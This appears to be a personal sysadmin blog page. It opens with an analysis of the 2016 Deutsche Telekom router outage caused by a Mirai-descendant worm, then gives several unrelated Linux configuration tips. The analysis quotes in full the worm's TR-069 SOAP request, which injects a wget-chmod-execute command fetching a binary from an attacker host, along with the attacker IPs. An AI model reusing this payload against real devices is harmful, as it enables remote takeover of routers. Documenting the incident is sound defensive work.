Todays Telekom problems

[Update]
This is a pretty nice description and summary: https://isc.sans.edu/forums/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759

The malware seems to be a descendant of the Mirai Linux worm
https://www.virustotal.com/en/file/7e84a8a74e93e567a6e7f781ab5764fe3bbc12c868b89e5c5c79924d5d5742e2/analysis/

which is described here
https://en.wikipedia.org/wiki/Mirai_(malware)
or here
https://www.incapsula.com/blog/malware-analysis-mirai-ddos-botnet.html

[/Update]

Many German Deutsche Telekom customers had connectivity problems tonight. Some people claimed that they could use their network again after changing the DNS server in their hosts. Most people got their boxes working again (for some time) after a reboot. Telekom communicated many misleading and conflicting information. Events are summarized here:

https://www.heise.de/newsticker/meldung/Grossstoerung-im-Telekom-Netz-3505820.html

I found some interesting facts here
https://www.heise.de/forum/Netze/News-Kommentare/Grossstoerung-im-Telekom-Netz/Re-15-08-2014-Millionen-DSL-Router-durch-TR-069-Fernwartung-kompromittierbar/posting-29559291/show/

From everything I saw it seems that some attacker sends a TR 69 xml command like

<?xml version="1.0"?>
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body> <u:SetNTPServers
xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget
http://l.ocalhost.host/1;chmod 777 1;./1`</NewNTPServer1>
<NewNTPServer2/> <NewNTPServer3/> <NewNTPServer4/>
        <NewNTPServer5/>
    </u:SetNTPServers>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

I still try to get information if this comes from inside the Telekom network or the outside. The number of access requests is declining since tonight:
https://www.heise.de/forum/Netze/News-Kommentare/Grossstoerung-im-Telekom-Netz/TR-069/posting-29558928/show/

It seems that Telekom now blocks Port 7547 tcp from the outside.

The URL seems to differ a bit. The server has IP
212.92.127.146 at the moment. People say it used to be 188.209.49.168.
(https://www.heise.de/forum/Netze/News-Kommentare/Grossstoerung-im-Telekom-Netz-dauert-an/Re-port-7547-scans-auf-Digitalisierungsbox/posting-29559739/show/).

Anyway, obviously this tries to inject some shell code via a bug first discovered here:
https://devicereversing.wordpress.com/2016/11/07/eirs-d1000-modem-is-wide-open-to-being-hacked/

First of all this changes the DNS server to some bullshit which explains the DNS problems… Second this loads a MIPS binary (SHA1:
60b0b1631b1c7112b34f6850f60fc62e95174428) into the ramdisk in /tmp and executes it. If the binary does not inject sth. permanently the show will be over after a reboot. So also this phenomenon is explained.

But now, what does the binary do? I just looked at the strings output and one thing is to disable the TR 69 port via

iptables -A INPUT -p tcp --destination-port 7547 -j DROP

and send some status information to a (for me) still unknown receiver:

POST /
HTTP/1.1
Myname--is:
Host:
Cookie:
http
url=

There is at least a second version of the binary (sha1:
feb6531b4509015a3a119f67b290175b284e9864) that additionally disables a locally running telnet daemon and seems to replicate itself via 2 different URLs:

POST /UD/act?1 HTTP/1.1
Host: 127.0.0.1:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 526
<?xml version="1.0"?><SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>  <u:SetNTPServers
xmlns:u="urn:dslforum-org:service:Time:1">
<NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/1;chmod 777
1;./1`</NewNTPServer1>   <NewNTPServer2></NewNTPServer2>
<NewNTPServer3></NewNTPServer3>   <NewNTPServer4></NewNTPServer4>
<NewNTPServer5></NewNTPServer5>  </u:SetNTPServers>
</SOAP-ENV:Body></SOAP-ENV:Envelope>

POST /UD/act?1 HTTP/1.1
Host: 127.0.0.1:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml Content-Length: 526

<?xml version="1.0"?><SOAP-ENV:Envelope  
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>  <u:SetNTPServers
xmlns:u="urn:dslforum-org:service:Time:1">
<NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/2;chmod 777
2;./2`</NewNTPServer1>   <NewNTPServer2></NewNTPServer2>
<NewNTPServer3></NewNTPServer3>   <NewNTPServer4></NewNTPServer4>
<NewNTPServer5></NewNTPServer5>  </u:SetNTPServers>
</SOAP-ENV:Body></SOAP-ENV:Envelope>

In one forum it was said that Telekom tries to use the same bug to inject an iptables command that closes the TR 69 port and hopes to be faster then the attackers. I’m still trying to get confirmation about this :).

https://www.heise.de/forum/Netze/News-Kommentare/Grossstoerung-im-Telekom-Netz/Misfortune-Cookie-neuaufgelegt/posting-29560638/show/

Advertisements

Cisco ASA ASDM in Linux — oracle JRE only

Before anyone else is starring at

java.lang.NoSuchMethodError:
sun.security.x509.NetscapeCertTypeExtension.get

or

java.lang.NumberFormatException: For input string: "72-internal" 

and wonders why the ASDM won’t work with Debian GNU/Linux. For some reason it’s just not compatible with openjdk. Install oracle-jdk as explained on https://wiki.debian.org/JavaPackage and make pretty sure that your package stays recent.

After installing it, I still had to change the JVM in itweb-settings to

/usr/lib/jvm/jdk-8-oracle-x64/jre

Shiny enterprise world.

Ubuntu 14.04, Freeradius and ntlm_auth

Beware: After updating Ubuntu to 14.04 you should fix your samba/ winbindd config as it has a major error that prevents freeradius from using ntlm_auth. Your have to change /etc/init/winbind.conf to

description "Samba Winbind"
author "David Weber"

start on (local-filesystems and net-device-up IFACE!=lo)
stop on runlevel [!2345]

respawn

pre-start script
test -x /usr/sbin/winbindd || exit 0
mkdir -p /var/lib/samba/winbindd_privileged
chgrp winbindd_priv /var/lib/samba/winbindd_privileged chmod 0750 /var/lib/samba/winbindd_privileged
end script

script
[ -r /etc/default/winbind ] && . /etc/default/winbind
exec /usr/sbin/winbindd -F $WINBINDD_OPTS
end script

and make horribly sure that it won’t be overwritten with the next update as they don’t seem to be interested to fix it…

c.f. https://bugs.launchpad.net/ubuntu/+source/samba/+bug/1330220

[Update]
Debian seems to have the same problem:
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=754339

Fix the font rendering of Calibri

If you see very bad artifacts when displaying small sizes of the Calibri font in Linux (which you are not allowed to use because it comes with a MS Windows only license) you should disable their embedded bitmap variants in $HOME/.fonts.conf:

<match target=”font” >
     <edit name=”embeddedbitmap” mode=”assign”>
         <bool>false</bool>
     </edit>
</match>

2ct and a cookie if someone sends me the snippet to only apply this to the Calibri font :-).

Thanks to
http://linuxg.net/fix-the-microsoft-font-rendering-under-libreoffice/ for the hint!

Linux Bridge vs Open vSwitch

As a short Follow-Up to
https://mohskitchen.wordpress.com/2014/04/26/first-steps-with-open-vswitch/

justindpettit wrote a nice Blog post about recent performance improvements in OVS:

http://networkheresy.com/2014/11/13/accelerating-open-vswitch-to-ludicrous-speed/

What does this mean for a simple KVM/ OpenStack setup? For me it shows that the Linux bridge is still superior when only doing Layer 2 forwarding. OVS might be as fast but takes a whole lot more CPU power which is taken away from your VMs. And it seems to be even worse for old versions of OVS in LTS distris.

gnome-shell full screen windows and klick through problems

Lately bought a Thinkpad Yoga and started using gnome3/ gnome-shell because of its nice tablet features. I really have to admit that people were visionary and implemented all this bullshit that only hinders you while working with mouse and keyboard. Good work with this, although I really miss the simple aesthetics of my former XFCE desktop with the BeOS-like window borders overall less clutter and especially superswitcher.

Anyway, now I’m on gnome-shell and had this really annoying bug where you always click “through” full screen windows (like Kodi, mplayer, virt-manager, HTML5 videos etc). Say you just opened kodi, put it into full screen and want to do a right klick — next think you see is the context menu of your desktop – yeah.

Long story short. I switched my mutter window ‘Focus Mode’ from “Mouse” to “Sloppy” using gnome-tweak-tool, section “Windows”. The focus still follows the mouse but clicks into full screen windows stay where they belong.

Mounting a hard disk with a ez drive partition

Today I stumbled upon a drive with a part table like

Disk /dev/sdb: 74.5 GiB, 80026361856 bytes, 156301488 sectors Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x213f213e

Device Boot Start End Sectors Size Id Type
/dev/sdb1 * 9 16434494 16434486 7.9G 55 EZ-Drive

Thanks to google I found this manual

http://fatooh.org/misc/ez-drive.html

with the quintessence that is

dd if=/dev/sdb bs=1 skip=958 count=66 of=/dev/sdb seek=446

Afterwards you see the ‘real’ partition-table.

Hint: It seems that once the Linux-Kernel noticed dos/windows Drive-Mappers itself and did the remapping for us. This was removed somewhere in the early 2.6ties. Some HowTos say the kernel parameter sdb=remap is supposed to re-enable this, but it didn’t work for me.